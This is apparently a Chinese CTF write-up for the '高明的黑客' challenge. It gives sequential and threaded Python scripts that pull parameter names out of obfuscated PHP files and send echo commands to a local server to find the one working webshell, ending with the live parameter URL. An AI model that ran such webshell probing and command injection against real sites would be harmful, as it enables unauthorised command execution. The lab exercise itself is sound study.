用 D盾 扫描会报出一大堆混淆代码和疑似 shell,不过其中没有几个是能用的。这题考察的是脚本编写能力:需要跑个脚本,逐个测试哪个是真正能用的。
上py
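import os
import requests

# Sequential audit helper for a locally hosted copy of the challenge source.
# It collects the $_GET / $_POST parameter names that appear in each PHP file
# and sends a harmless marker command to the local web server to see which
# parameter (if any) is actually live.

# Directory holding the unpacked challenge source.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Every entry of that directory; each one is scanned in turn.
files = os.listdir(path=path)

# Seconds to wait for the local server before abandoning a single probe, so
# one hanging page cannot stall the whole run.
REQUEST_TIMEOUT = 5


def _extract_params(filename, marker):
    """Return the parameter names that follow *marker* in *filename*.

    *marker* is the literal prefix ``$_GET['`` or ``$_POST['``; the name is
    whatever sits between it and the next single quote. Every occurrence on
    a line is collected (including one at column 0), duplicates are dropped
    and first-seen order is kept.
    """
    names = []
    # errors='ignore': the obfuscated sources may contain bytes that do not
    # decode in the platform's default encoding; only ASCII names matter here.
    with open(path + filename, 'r', errors='ignore') as f:
        for line in f:
            start = line.find(marker)
            while start != -1:
                start += len(marker)
                end = line.find("'", start)
                if end == -1:
                    # Unterminated name on this line: nothing usable follows.
                    break
                names.append(line[start:end])
                start = line.find(marker, end)
    return list(dict.fromkeys(names))


# Parameters read through $_GET
def GET(filename):
    """Return the names used as ``$_GET['name']`` in *filename*."""
    return _extract_params(filename, "$_GET['")


# Parameters read through $_POST
def POST(filename):
    """Return the names used as ``$_POST['name']`` in *filename*."""
    return _extract_params(filename, "$_POST['")


def _marker_seen(send, url, marker, **kwargs):
    """Send one probe with *send* and report whether *marker* is in the reply.

    A failed or timed-out request is logged and counted as "not seen" so the
    scan carries on with the next parameter.
    """
    try:
        response = send(url=url, timeout=REQUEST_TIMEOUT, **kwargs)
    except requests.RequestException as err:
        print("REQUEST FAILED: {} ({})".format(url, err))
        return False
    # NOTE: a page that merely reflects the parameter would also contain the
    # marker, so a hit still has to be confirmed by hand.
    return marker in response.text


if __name__ == "__main__":
    for file in files:
        if file == ".idea":
            continue
        print("OPEN FILE:" + file)
        url = "http://127.0.0.1/{}".format(file)
        for i in GET(file):
            # params= lets requests do the URL encoding of name and value.
            if _marker_seen(requests.get, url, "GET SUCCESS",
                            params={i: 'echo "GET SUCCESS"'}):
                print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
                raise SystemExit(0)
        for i in POST(file):
            # Must be a real POST: a GET request carrying a body does not
            # populate $_POST on the PHP side.
            if _marker_seen(requests.post, url, "POST SUCCESS",
                            data={i: 'echo "POST SUCCESS"'}):
                print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
                raise SystemExit(0)
        print("CLOSE FILE")

# Write-up note: this sequential version is painfully slow, roughly seven or
# eight files a minute, so by the author's estimate it would never finish.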
还是要多线程,最后参考大佬脚本搞的。
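# Result reported in the write-up:
#   /xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27

import os
import requests
import threading
import time
import sys

# Threaded audit helper for a locally hosted copy of the challenge source.
# It collects the $_GET / $_POST parameter names that appear in each PHP file
# and sends a harmless marker command to the local web server to see which
# parameter (if any) is actually live.

# Directory holding the unpacked challenge source.
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Every entry of that directory; each one is handed to a worker thread.
files = os.listdir(path=path)

# Seconds to wait for the local server before abandoning a single probe, so
# one hanging page cannot pin a worker forever.
REQUEST_TIMEOUT = 5

# Set by the first worker that gets a hit; the launcher stops starting new
# workers once it is set (sys.exit() inside a thread ends only that thread).
_found = threading.Event()


def _extract_params(filename, marker):
    """Return the parameter names that follow *marker* in *filename*.

    *marker* is the literal prefix ``$_GET['`` or ``$_POST['``; the name is
    whatever sits between it and the next single quote. Every occurrence on
    a line is collected (including one at column 0), duplicates are dropped
    and first-seen order is kept.
    """
    names = []
    # errors='ignore': the obfuscated sources may contain bytes that do not
    # decode in the platform's default encoding; only ASCII names matter here.
    with open(path + filename, 'r', errors='ignore') as f:
        for line in f:
            start = line.find(marker)
            while start != -1:
                start += len(marker)
                end = line.find("'", start)
                if end == -1:
                    # Unterminated name on this line: nothing usable follows.
                    break
                names.append(line[start:end])
                start = line.find(marker, end)
    return list(dict.fromkeys(names))


# Parameters read through $_GET
def GET(filename):
    """Return the names used as ``$_GET['name']`` in *filename*."""
    return _extract_params(filename, "$_GET['")


# Parameters read through $_POST
def POST(filename):
    """Return the names used as ``$_POST['name']`` in *filename*."""
    return _extract_params(filename, "$_POST['")


def _probe(send, url, marker, **kwargs):
    """Send one probe; return the response text if *marker* is in it, else None.

    A failed or timed-out request is logged and treated as a miss so the
    worker carries on with the next parameter. The response is always closed.
    """
    try:
        response = send(url=url, timeout=REQUEST_TIMEOUT, **kwargs)
    except requests.RequestException as err:
        print("REQUEST FAILED: {} ({})".format(url, err))
        return None
    try:
        text = response.text
    finally:
        response.close()
    # NOTE: a page that merely reflects the parameter would also contain the
    # marker, so a hit still has to be confirmed by hand.
    return text if marker in text else None


def _record_hit(method, file, name, text):
    """Print the hit, save the response to shell.txt and stop this thread."""
    print("SUCCESS {}! YOU FIND THE SHELL {} BY {}".format(method, file, name))
    with open("shell.txt", "w", encoding="utf-8") as f:
        f.write(text)
    _found.set()
    # Ends the program when called from the main thread, and only the
    # current worker when called from a thread.
    sys.exit(0)


def get_content(file):
    """Probe every GET and POST parameter found in *file* on the local server.

    On the first response containing the marker, the hit is printed, the
    response body is written to ``shell.txt`` and ``sys.exit(0)`` is raised.
    """
    print("OPEN FILE:" + file)
    url = "http://127.0.0.1/src/{}".format(file)
    for i in GET(file):
        # params= lets requests do the URL encoding of name and value.
        text = _probe(requests.get, url, "GET SUCCESS",
                      params={i: 'echo "GET SUCCESS"'})
        if text is not None:
            _record_hit("GET", file, i, text)
    for i in POST(file):
        # Must be a real POST: a GET request carrying a body does not
        # populate $_POST on the PHP side.
        text = _probe(requests.post, url, "POST SUCCESS",
                      data={i: 'echo "POST SUCCESS"'})
        if text is not None:
            _record_hit("POST", file, i, text)
    print("CLOSE FILE")


def _run_limited(file, gate):
    """Thread body: scan *file*, then hand the concurrency slot back."""
    try:
        # Sub-directories (an IDE folder, for instance) cannot be opened as
        # source files; skip them instead of failing the worker.
        if os.path.isfile(path + file):
            get_content(file)
    finally:
        gate.release()


if __name__ == "__main__":
    # At most 100 files are scanned at the same time.
    s1 = threading.Semaphore(100)
    # NOTE(review): HTTPAdapter appears to bind its retry default when the
    # class is defined, so this assignment probably has no effect; mount an
    # HTTPAdapter(max_retries=5) on a Session if retries matter -- confirm.
    requests.adapters.DEFAULT_RETRIES = 5
    workers = []
    for file in files:
        if _found.is_set():
            break
        # Blocks while 100 workers are busy; released in _run_limited.
        s1.acquire()
        t = threading.Thread(target=_run_limited, args=(file, s1))
        t.start()
        workers.append(t)
    for t in workers:
        t.join()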